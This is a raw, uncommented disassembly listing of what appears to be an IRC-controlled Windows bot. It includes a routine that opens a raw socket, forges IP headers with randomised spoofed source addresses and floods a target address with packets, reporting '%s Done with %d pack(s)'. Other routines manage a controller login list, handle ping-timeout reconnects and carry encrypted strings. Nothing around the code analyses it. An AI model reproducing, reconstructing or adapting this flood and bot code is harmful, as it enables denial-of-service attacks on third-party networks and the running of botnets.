loc_40F4A2: ; CODE XREF: sub_40F467+35�j
sub ecx, edx
sar ecx, 2
loc_40F4A7: ; CODE XREF: sub_40F467+39�j
add eax, ecx
test eax, eax
mov [ebp+var_4], eax
jge short loc_40F4B2
xor eax, eax
loc_40F4B2: ; CODE XREF: sub_40F467+47�j
shl eax, 2
push eax
call sub_423F55
mov edx, eax
mov eax, [esi+4]
pop ecx
mov [ebp+arg_4], edx
jmp short loc_40F4D4
; ---------------------------------------------------------------------------
loc_40F4C6: ; CODE XREF: sub_40F467+70�j
test edx, edx
jz short loc_40F4CE
mov ecx, [eax]
mov [edx], ecx
loc_40F4CE: ; CODE XREF: sub_40F467+61�j
add edx, 4
add eax, 4
loc_40F4D4: ; CODE XREF: sub_40F467+5D�j
cmp eax, [ebp+arg_0]
jnz short loc_40F4C6
test edi, edi
mov eax, edx
jbe short loc_40F4F2
mov ecx, edi
loc_40F4E1: ; CODE XREF: sub_40F467+89�j
test eax, eax
jz short loc_40F4EC
mov ebx, [ebp+arg_8]
mov ebx, [ebx]
mov [eax], ebx
loc_40F4EC: ; CODE XREF: sub_40F467+7C�j
add eax, 4
dec ecx
jnz short loc_40F4E1
loc_40F4F2: ; CODE XREF: sub_40F467+76�j
mov eax, [esi+8]
mov ecx, edi
shl ecx, 2
cmp [ebp+arg_0], eax
mov [ebp+arg_8], eax
lea ebx, [ecx+edx]
jz short loc_40F521
mov eax, ebx
sub eax, ecx
sub eax, edx
add eax, [ebp+arg_0]
loc_40F50E: ; CODE XREF: sub_40F467+B8�j
test ebx, ebx
jz short loc_40F516
mov ecx, [eax]
mov [ebx], ecx
loc_40F516: ; CODE XREF: sub_40F467+A9�j
add eax, 4
add ebx, 4
cmp eax, [ebp+arg_8]
jnz short loc_40F50E
loc_40F521: ; CODE XREF: sub_40F467+9C�j
push dword ptr [esi+4]
call sub_421C78
mov eax, [ebp+var_4]
mov edx, [esi+4]
pop ecx
mov ecx, [ebp+arg_4]
test edx, edx
lea eax, [ecx+eax*4]
mov [esi+0Ch], eax
jnz short loc_40F541
xor eax, eax
jmp short loc_40F549
; ---------------------------------------------------------------------------
loc_40F541: ; CODE XREF: sub_40F467+D4�j
mov eax, [esi+8]
sub eax, edx
sar eax, 2
loc_40F549: ; CODE XREF: sub_40F467+D8�j
add eax, edi
mov [esi+4], ecx
lea eax, [ecx+eax*4]
mov [esi+8], eax
jmp loc_40F62B
; ---------------------------------------------------------------------------
loc_40F559: ; CODE XREF: sub_40F467+19�j
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, edx
sar eax, 2
cmp eax, edi
jnb short loc_40F5D5
mov ebx, edi
shl ebx, 2
cmp edx, ecx
mov [ebp+arg_0], ebx
lea eax, [ebx+edx]
mov [ebp+var_4], eax
jz short loc_40F59C
sub eax, ebx
mov ebx, [ebp+var_4]
mov [ebp+arg_4], eax
loc_40F581: ; CODE XREF: sub_40F467+130�j
test ebx, ebx
jz short loc_40F58C
mov eax, [eax]
mov [ebx], eax
mov eax, [ebp+arg_4]
loc_40F58C: ; CODE XREF: sub_40F467+11C�j
add eax, 4
add ebx, 4
cmp eax, ecx
mov [ebp+arg_4], eax
jnz short loc_40F581
mov ebx, [ebp+arg_0]
loc_40F59C: ; CODE XREF: sub_40F467+110�j
mov eax, [esi+8]
mov ecx, eax
sub ecx, edx
sar ecx, 2
sub edi, ecx
mov ecx, [ebp+arg_8]
jz short loc_40F5C0
mov [ebp+arg_0], edi
loc_40F5B0: ; CODE XREF: sub_40F467+157�j
test eax, eax
jz short loc_40F5B8
mov edi, [ecx]
mov [eax], edi
loc_40F5B8: ; CODE XREF: sub_40F467+14B�j
add eax, 4
dec [ebp+arg_0]
jnz short loc_40F5B0
loc_40F5C0: ; CODE XREF: sub_40F467+144�j
mov eax, [esi+8]
jmp short loc_40F5CC
; ---------------------------------------------------------------------------
loc_40F5C5: ; CODE XREF: sub_40F467+167�j
mov edi, [ecx]
mov [edx], edi
add edx, 4
loc_40F5CC: ; CODE XREF: sub_40F467+15C�j
cmp edx, eax
jnz short loc_40F5C5
add [esi+8], ebx
jmp short loc_40F62B
; ---------------------------------------------------------------------------
loc_40F5D5: ; CODE XREF: sub_40F467+FE�j
test edi, edi
jbe short loc_40F62B
shl edi, 2
mov eax, ecx
mov ebx, ecx
mov [ebp+arg_0], edi
sub eax, edi
jmp short loc_40F5F8
; ---------------------------------------------------------------------------
loc_40F5E7: ; CODE XREF: sub_40F467+193�j
test ebx, ebx
jz short loc_40F5F2
mov edi, [eax]
mov [ebx], edi
mov edi, [ebp+arg_0]
loc_40F5F2: ; CODE XREF: sub_40F467+182�j
add ebx, 4
add eax, 4
loc_40F5F8: ; CODE XREF: sub_40F467+17E�j
cmp eax, ecx
jnz short loc_40F5E7
mov ecx, [esi+8]
mov eax, ecx
sub eax, edi
cmp edx, eax
jz short loc_40F615
loc_40F607: ; CODE XREF: sub_40F467+1AC�j
sub eax, 4
sub ecx, 4
cmp eax, edx
mov ebx, [eax]
mov [ecx], ebx
jnz short loc_40F607
loc_40F615: ; CODE XREF: sub_40F467+19E�j
lea eax, [edi+edx]
jmp short loc_40F624
; ---------------------------------------------------------------------------
loc_40F61A: ; CODE XREF: sub_40F467+1BF�j
mov ecx, [ebp+arg_8]
mov ecx, [ecx]
mov [edx], ecx
add edx, 4
loc_40F624: ; CODE XREF: sub_40F467+1B1�j
cmp edx, eax
jnz short loc_40F61A
add [esi+8], edi
loc_40F62B: ; CODE XREF: sub_40F467+ED�j
; sub_40F467+16C�j ...
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_40F467 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F632 proc near ; DATA XREF: .text:0042F380�o
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_40F728
lea eax, [ebp+var_1C]
push offset dword_4300C0
push eax
call sub_423A87
loc_40F64F: ; DATA XREF: .text:off_42F368�o
; .text:off_42F378�o
push esi
mov esi, ecx
call sub_40F36E
test [esp+20h+var_18], 1
jz short loc_40F665
push esi
call sub_421C78
pop ecx
loc_40F665: ; CODE XREF: sub_40F632+2A�j
mov eax, esi
pop esi
retn 4
sub_40F632 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F66B proc near ; CODE XREF: sub_40F3E1+7A�p
mov eax, offset loc_42EEF4
call sub_423A68
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_40F691
mov edi, [ebp+8]
loc_40F691: ; CODE XREF: sub_40F66B+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_40F69E
xor eax, eax
loc_40F69E: ; CODE XREF: sub_40F66B+2F�j
push eax
call sub_423F55
pop ecx
mov [ebp+8], eax
jmp short loc_40F6CF
; ---------------------------------------------------------------------------
loc_40F6AA: ; DATA XREF: .text:00430174�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_40F6B9
xor eax, eax
loc_40F6B9: ; CODE XREF: sub_40F66B+4A�j
push eax
call sub_423F55
mov [ebp+8], eax
pop ecx
mov eax, offset loc_40F6C9
retn
; ---------------------------------------------------------------------------
loc_40F6C9: ; DATA XREF: sub_40F66B+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_40F6CF: ; CODE XREF: sub_40F66B+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_40F6ED
cmp eax, edi
jbe short loc_40F6DC
mov eax, edi
loc_40F6DC: ; CODE XREF: sub_40F66B+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_4223F0
add esp, 0Ch
loc_40F6ED: ; CODE XREF: sub_40F66B+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40F143
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40F70D
mov edi, ebx
loc_40F70D: ; CODE XREF: sub_40F66B+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [edi+eax], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40F66B endp
; =============== S U B R O U T I N E =======================================
sub_40F728 proc near ; CODE XREF: sub_40F632+A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_40F389
mov dword ptr [esi], offset off_42F378
mov eax, esi
pop esi
retn 4
sub_40F728 endp
; =============== S U B R O U T I N E =======================================
sub_40F740 proc near ; CODE XREF: sub_40F2DD+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_40F76D
mov al, [esi-1]
test al, al
jz short loc_40F76D
cmp al, 0FFh
jz short loc_40F76D
push 1
call sub_40F143
push esi
call sub_422120
pop ecx
push eax
push esi
mov ecx, edi
call sub_40F17B
loc_40F76D: ; CODE XREF: sub_40F740+9�j
; sub_40F740+10�j ...
pop edi
pop esi
retn
sub_40F740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F770 proc near ; CODE XREF: sub_40FA20+5F�p
var_20C = byte ptr -20Ch
var_7C = byte ptr -7Ch
var_7B = byte ptr -7Bh
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
push [ebp+arg_0]
call dword_42F2AC ; inet_addr
push 0Eh
mov [ebp+var_4], eax
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_7B]
mov [ebp+var_7C], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_20C]
push eax
push 202h
call dword_42F290 ; WSAStartup
test eax, eax
jz short loc_40F7C0
push [ebp+arg_4]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_40F7C0: ; CODE XREF: sub_40F770+3E�j
mov esi, offset dword_4552D0
push 100h
push esi
call dword_42F2A8 ; gethostname
push esi
call dword_42F274 ; gethostbyname
mov eax, [eax+0Ch]
push 1
push ebx
mov edi, 0FFh
mov eax, [eax]
push ebx
push edi
push 3
mov esi, [eax]
push 2
call dword_42F2A0 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40F7FE
push eax
jmp short loc_40F81D
; ---------------------------------------------------------------------------
loc_40F7FE: ; CODE XREF: sub_40F770+89�j
lea ecx, [ebp+var_30]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_30], 1
call dword_4542F0 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40F84F
push [ebp+arg_0]
loc_40F81D: ; CODE XREF: sub_40F770+8C�j
call dword_42F298 ; closesocket
push [ebp+arg_4]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_8]
push esi
call sub_41074B
mov ecx, [ebp+arg_8]
push offset dword_43963C
push esi
call sub_410720
xor eax, eax
jmp loc_40FA1B
; ---------------------------------------------------------------------------
loc_40F84F: ; CODE XREF: sub_40F770+A8�j
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_40F878
push offset aStopped_ ; "Stopped."
push 8
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_C]
call sub_41C090
add esp, 20h
loc_40F878: ; CODE XREF: sub_40F770+E9�j
push 10h
lea eax, [ebp+var_40]
push ebx
push eax
call sub_4221F0
call sub_4220FC
cdq
idiv edi
and esi, 0FFFFFFh
mov [ebp+var_40], 2
mov edi, edx
shl edi, 18h
or edi, esi
call sub_4220FC
mov [ebp+var_3E], ax
mov eax, [ebp+var_4]
push 5DCh
push 1
mov [ebp+var_3C], eax
call sub_423F63
mov esi, dword_42F2B8
add esp, 14h
mov [ebp+arg_8], eax
mov [ebp+var_2C], 46h
push 604h
call esi ; dword_42F2B8
push ebx
mov [ebp+var_2A], ax
call esi ; dword_42F2B8
or [ebp+var_24], 0FFh
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
push ebx
mov [ebp+var_26], bx
mov [ebp+var_23], 2
mov [ebp+var_22], bx
mov [ebp+var_2B], bl
mov [ebp+var_1C], eax
mov [ebp+var_20], edi
call esi ; dword_42F2B8
push ebx
mov [ebp+var_18], ax
call esi ; dword_42F2B8
mov [ebp+var_16], ax
mov [ebp+var_14], 11h
mov [ebp+var_13], 5
call sub_4220FC
push offset a0_0_0_0 ; "0.0.0.0"
mov [ebp+var_A], ax
mov [ebp+var_C], bl
mov [ebp+var_B], bl
call dword_42F2AC ; inet_addr
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
push 10h
mov [ebp+var_8], eax
pop edi
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_7C]
mov [ebp+var_12], bx
push eax
call sub_4223F0
lea eax, [ebp+var_7C]
push edi
push eax
call sub_414271
mov [ebp+var_12], ax
lea eax, [ebp+var_2C]
push 18h
push eax
lea eax, [ebp+var_7C]
push eax
call sub_4223F0
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_64]
push eax
call sub_4223F0
push 4
lea eax, [ebp+var_54]
push ebx
push eax
call sub_4221F0
lea eax, [ebp+var_7C]
push 28h
push eax
call sub_414271
add esp, 40h
push eax
call dword_42F278 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 18h
push eax
lea eax, [ebp+var_7C]
push eax
call sub_4223F0
add esp, 0Ch
lea eax, [ebp+var_40]
mov esi, dword_42F2A4
push edi
push eax
push ebx
lea eax, [ebp+var_7C]
push 28h
push eax
push [ebp+arg_0]
call esi ; dword_42F2A4
mov [ebp+arg_14], eax
lea eax, [ebp+var_2C]
push 18h
push eax
push [ebp+arg_8]
call sub_4223F0
lea eax, [ebp+var_14]
push edi
push eax
push [ebp+arg_8]
call sub_4223F0
add esp, 18h
lea eax, [ebp+var_40]
push edi
push eax
push ebx
push 604h
push [ebp+arg_8]
push [ebp+arg_0]
call esi ; dword_42F2A4
push [ebp+arg_0]
inc dword_454450
call dword_42F298 ; closesocket
cmp [ebp+arg_14], 0FFFFFFFFh
jnz short loc_40FA18
push [ebp+arg_4]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_40FA18: ; CODE XREF: sub_40F770+296�j
xor eax, eax
inc eax
loc_40FA1B: ; CODE XREF: sub_40F770+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA20 proc near ; DATA XREF: sub_403B2C+5949�o
var_124 = dword ptr -124h
var_11C = byte ptr -11Ch
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 124h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_124]
rep movsd
mov esi, dword_42F164
mov dword ptr [eax+120h], 1
mov eax, [ebp+var_124]
mov [ebp+arg_0], eax
call esi ; dword_42F164
mov ebx, eax
call esi ; dword_42F164
mov edi, 3E8h
jmp short loc_40FA91
; ---------------------------------------------------------------------------
loc_40FA62: ; CODE XREF: sub_40FA20+7C�j
push [ebp+var_C]
lea eax, [ebp+var_9C]
push [ebp+var_8]
push eax
lea eax, [ebp+var_11C]
push [ebp+var_124]
push [ebp+var_1C]
push eax
call sub_40F770
add esp, 18h
push 0Ah
call dword_42F15C ; Sleep
call esi ; dword_42F164
loc_40FA91: ; CODE XREF: sub_40FA20+40�j
mov ecx, edi
xor edx, edx
sub eax, ebx
div ecx
cmp eax, [ebp+var_14]
jbe short loc_40FA62
xor ebx, ebx
mov edi, offset a2fulsVpayi0 ; "2FUlS/VPAyI0"
cmp [ebp+var_8], ebx
mov esi, offset aSDoneWithDPack ; "%s Done with %d pack(s)"
jnz short loc_40FACE
cmp [ebp+var_C], ebx
jnz short loc_40FAD3
push dword_454450
lea eax, [ebp+var_9C]
push edi
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_40FACE: ; CODE XREF: sub_40FA20+8D�j
cmp [ebp+var_C], ebx
jz short loc_40FAED
loc_40FAD3: ; CODE XREF: sub_40FA20+92�j
push dword_454450
lea eax, [ebp+var_9C]
push edi
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 14h
loc_40FAED: ; CODE XREF: sub_40FA20+B1�j
push [ebp+var_1C]
call sub_41C059
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_40FA20 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_412049
loc_40FAFF: ; CODE XREF: sub_412049+5�j
push esi
mov esi, ecx
and dword ptr [esi+28h], 0
call sub_40FDC0
and byte ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
mov byte ptr [esi+5], 1
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_412049
; ---------------------------------------------------------------------------
loc_40FB1F: ; CODE XREF: .text:00412064�j
mov eax, [ecx+28h]
test eax, eax
jz short locret_40FB2C
push eax
call sub_40FCCD
locret_40FB2C: ; CODE XREF: .text:0040FB24�j
retn
; ---------------------------------------------------------------------------
loc_40FB2D: ; DATA XREF: sub_41A0E6+1C�o
mov eax, [esp+4]
sub esp, 240h
mov ecx, 90h
push ebx
push ebp
push esi
push edi
mov esi, eax
lea edi, [esp+10h]
rep movsd
mov edi, dword_42F164
mov dword ptr [eax+0BCh], 1
mov esi, 3E8h
loc_40FB5D: ; CODE XREF: .text:0040FB9E�j
call edi ; dword_42F164
xor edx, edx
mov ecx, esi
div ecx
mov ecx, dword_45450C
xor edx, edx
mov ebp, esi
mov ebx, eax
mov eax, ecx
div ebp
mov ebp, 5DCh
sub ebx, eax
cmp ebx, ebp
ja short loc_40FBA0
mov ecx, [esp+10h]
call sub_41111B
mov ecx, [esp+10h]
push eax
call sub_4105B8
push 16E360h
call dword_42F15C ; Sleep
jmp short loc_40FB5D
; ---------------------------------------------------------------------------
loc_40FBA0: ; CODE XREF: .text:0040FB7E�j
mov eax, ecx
xor edx, edx
mov ecx, esi
push ebp
div ecx
mov ebx, eax
call edi ; dword_42F164
xor edx, edx
mov ecx, esi
div ecx
sub eax, ebx
push eax
push ebx
call edi ; dword_42F164
xor edx, edx
div esi
push eax
push offset aPingTimeout?DD ; "Ping Timeout? (%d-%d)%d/%d"
push dword ptr [esp+24h]
call sub_41015C
add esp, 18h
push 0
call dword_42F150 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FBDB proc near ; CODE XREF: sub_40FFB4+132�p
; sub_40FFB4+146�p ...
var_1000 = byte ptr -1000h
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_1000]
push [ebp+arg_8]
push 1000h
push eax
call sub_423640
add esp, 10h
lea eax, [ebp+var_1000]
push 0
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_1000]
push eax
push [ebp+arg_4]
call dword_454350 ; send
inc eax
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40FBDB endp
; =============== S U B R O U T I N E =======================================
sub_40FC2B proc near ; CODE XREF: sub_40FC86+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
jmp short loc_40FC56
; ---------------------------------------------------------------------------
loc_40FC35: ; CODE XREF: sub_40FC2B+2E�j
cmp [esi+8], edi
jnz short loc_40FC53
push 0Ch
call sub_423F55
mov [esi+8], eax
mov [eax+4], edi
mov eax, [esi+8]
pop ecx
mov [eax], edi
mov eax, [esi+8]
mov [eax+8], edi
loc_40FC53: ; CODE XREF: sub_40FC2B+D�j
mov esi, [esi+8]
loc_40FC56: ; CODE XREF: sub_40FC2B+8�j
cmp [esi+4], edi
jnz short loc_40FC35
mov eax, [esp+8+arg_8]
push [esp+8+arg_4]
mov [esi+4], eax
call sub_422120
inc eax
push eax
call sub_423F55
pop ecx
mov [esi], eax
pop ecx
push [esp+8+arg_4]
push eax
call dword_42F04C ; lstrcpyA
pop edi
pop esi
retn 0Ch
sub_40FC2B endp
; =============== S U B R O U T I N E =======================================
sub_40FC86 proc near ; CODE XREF: sub_41A1C8+13�p
; sub_41A1C8+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+28h]
test eax, eax
jnz short loc_40FCB9
push 0Ch
call sub_423F55
mov [esi+28h], eax
and dword ptr [eax+4], 0
mov eax, [esi+28h]
pop ecx
push [esp+4+arg_4]
and dword ptr [eax], 0
mov eax, [esi+28h]
push [esp+8+arg_0]
and dword ptr [eax+8], 0
push dword ptr [esi+28h]
jmp short loc_40FCC2
; ---------------------------------------------------------------------------
loc_40FCB9: ; CODE XREF: sub_40FC86+8�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
loc_40FCC2: ; CODE XREF: sub_40FC86+31�j
mov ecx, esi
call sub_40FC2B
pop esi
retn 8
sub_40FC86 endp
; =============== S U B R O U T I N E =======================================
sub_40FCCD proc near ; CODE XREF: .text:0040FB27�p
; sub_40FCCD+D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+8]
test eax, eax
jz short loc_40FCDF
push eax
call sub_40FCCD
loc_40FCDF: ; CODE XREF: sub_40FCCD+A�j
mov eax, [esi]
test eax, eax
jz short loc_40FCEC
push eax
call sub_421C78
pop ecx
loc_40FCEC: ; CODE XREF: sub_40FCCD+16�j
push esi
call sub_421C78
pop ecx
pop esi
retn 4
sub_40FCCD endp
; =============== S U B R O U T I N E =======================================
sub_40FCF7 proc near ; CODE XREF: sub_419B2F+22F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
mov eax, offset dword_454510
loc_40FCFF: ; CODE XREF: sub_40FCF7+18�j
cmp byte ptr [eax], 0
jz short loc_40FD18
add eax, 0BFh
inc ebx
cmp eax, offset byte_45474D
jl short loc_40FCFF
or eax, 0FFFFFFFFh
loc_40FD14: ; CODE XREF: sub_40FCF7+5C�j
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40FD18: ; CODE XREF: sub_40FCF7+B�j
push esi
mov esi, ebx
imul esi, 0BFh
push edi
mov edi, dword_42F04C
push [esp+0Ch+arg_0]
lea eax, dword_454510[esi]
push eax
call edi ; dword_42F04C
push [esp+0Ch+arg_4]
lea eax, dword_454520[esi]
push eax
call edi ; dword_42F04C
push [esp+0Ch+arg_8]
lea eax, dword_454530[esi]
push eax
call edi ; dword_42F04C
pop edi
mov eax, ebx
pop esi
jmp short loc_40FD14
sub_40FCF7 endp
; =============== S U B R O U T I N E =======================================
sub_40FD55 proc near ; CODE XREF: sub_410269+CA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
mov ebx, ecx
xor edi, edi
mov esi, offset dword_454510
loc_40FD61: ; CODE XREF: sub_40FD55+54�j
cmp byte ptr [esi], 0
jz short loc_40FD9C
push [esp+0Ch+arg_0]
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40FD9C
push [esp+0Ch+arg_4]
lea eax, [esi+10h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40FD9C
push [esp+0Ch+arg_8]
lea eax, [esi+20h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_40FDB4
loc_40FD9C: ; CODE XREF: sub_40FD55+F�j
; sub_40FD55+1F�j ...
add esi, 0BFh
inc edi
cmp esi, offset byte_45474D
jl short loc_40FD61
or eax, 0FFFFFFFFh
loc_40FDAE: ; CODE XREF: sub_40FD55+69�j
pop edi
pop esi
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40FDB4: ; CODE XREF: sub_40FD55+45�j
push edi
mov ecx, ebx
call sub_40FE00
mov eax, edi
jmp short loc_40FDAE
sub_40FD55 endp
; =============== S U B R O U T I N E =======================================
sub_40FDC0 proc near ; CODE XREF: sub_412049-2543�p
; sub_40FFB4+B8�p
push esi
mov esi, offset dword_454520
loc_40FDC6: ; CODE XREF: sub_40FDC0+3C�j
push 10h
lea eax, [esi-10h]
push 0
push eax
call sub_4221F0
push 10h
push 0
push esi
call sub_4221F0
push 9Fh
lea eax, [esi+10h]
push 0
push eax
call sub_4221F0
add esi, 0BFh
add esp, 24h
cmp esi, offset byte_45475D
jl short loc_40FDC6
pop esi
retn
sub_40FDC0 endp
; =============== S U B R O U T I N E =======================================
sub_40FE00 proc near ; CODE XREF: sub_40FD55+62�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
imul esi, 0BFh
lea eax, dword_454510[esi]
cmp byte ptr [eax], 0
jz short loc_40FE4B
push 10h
push 0
push eax
call sub_4221F0
push 10h
lea eax, dword_454520[esi]
push 0
push eax
call sub_4221F0
push 9Fh
lea eax, dword_454530[esi]
push 0
push eax
call sub_4221F0
xor eax, eax
add esp, 24h
inc eax
jmp short loc_40FE4D
; ---------------------------------------------------------------------------
loc_40FE4B: ; CODE XREF: sub_40FE00+14�j
xor eax, eax
loc_40FE4D: ; CODE XREF: sub_40FE00+49�j
pop esi
retn 4
sub_40FE00 endp
; =============== S U B R O U T I N E =======================================
sub_40FE51 proc near ; CODE XREF: sub_410269+B1�p
; sub_419B2F+C4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, offset dword_454510
loc_40FE57: ; CODE XREF: sub_40FE51+4D�j
cmp byte ptr [esi], 0
jz short loc_40FE92
push [esp+4+arg_0]
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40FE92
push [esp+4+arg_4]
lea eax, [esi+10h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40FE92
push [esp+4+arg_8]
lea eax, [esi+20h]
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_40FEA6
loc_40FE92: ; CODE XREF: sub_40FE51+9�j
; sub_40FE51+19�j ...
add esi, 0BFh
cmp esi, offset byte_45474D
jl short loc_40FE57
xor eax, eax
loc_40FEA2: ; CODE XREF: sub_40FE51+58�j
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_40FEA6: ; CODE XREF: sub_40FE51+3F�j
xor eax, eax
inc eax
jmp short loc_40FEA2
sub_40FE51 endp
; =============== S U B R O U T I N E =======================================
sub_40FEAB proc near ; CODE XREF: sub_419B2F+130�p
; sub_419B2F+1D8�p ...
mov eax, offset dword_454510
loc_40FEB0: ; CODE XREF: sub_40FEAB+14�j
cmp byte ptr [eax], 0
jnz short loc_40FEC4
add eax, 0BFh
cmp eax, offset byte_45474D
jl short loc_40FEB0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40FEC4: ; CODE XREF: sub_40FEAB+8�j
xor eax, eax
inc eax
retn
sub_40FEAB endp
; =============== S U B R O U T I N E =======================================
sub_40FEC8 proc near ; CODE XREF: sub_403B2C+7F6�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push edi
push offset aH08_Drzwx_ ; "h/08./drzWX."
mov edi, ecx
push offset aSLoginList ; "%s Login List:"
push ebp
push edi
call sub_4104F6
add esp, 10h
xor ebx, ebx
mov esi, offset dword_454510
loc_40FEED: ; CODE XREF: sub_40FEC8+62�j
cmp byte ptr [esi], 0
jz short loc_40FF0D
lea eax, [esi+10h]
lea ecx, [eax+10h]
push ecx
push eax
push esi
push ebx
push offset aISS@S ; "<%i> %s!%s@%s"
push ebp
push edi
call sub_4104F6
add esp, 1Ch
jmp short loc_40FF1D
; ---------------------------------------------------------------------------
loc_40FF0D: ; CODE XREF: sub_40FEC8+28�j
push ebx
push offset aIEmpty ; "<%i> <Empty>"
push ebp
push edi
call sub_4104F6
add esp, 10h
loc_40FF1D: ; CODE XREF: sub_40FEC8+43�j
add esi, 0BFh
inc ebx
cmp esi, offset byte_45474D
jl short loc_40FEED
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSLoginListComp ; "%s Login List complete."
push ebp
push edi
call sub_4104F6
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
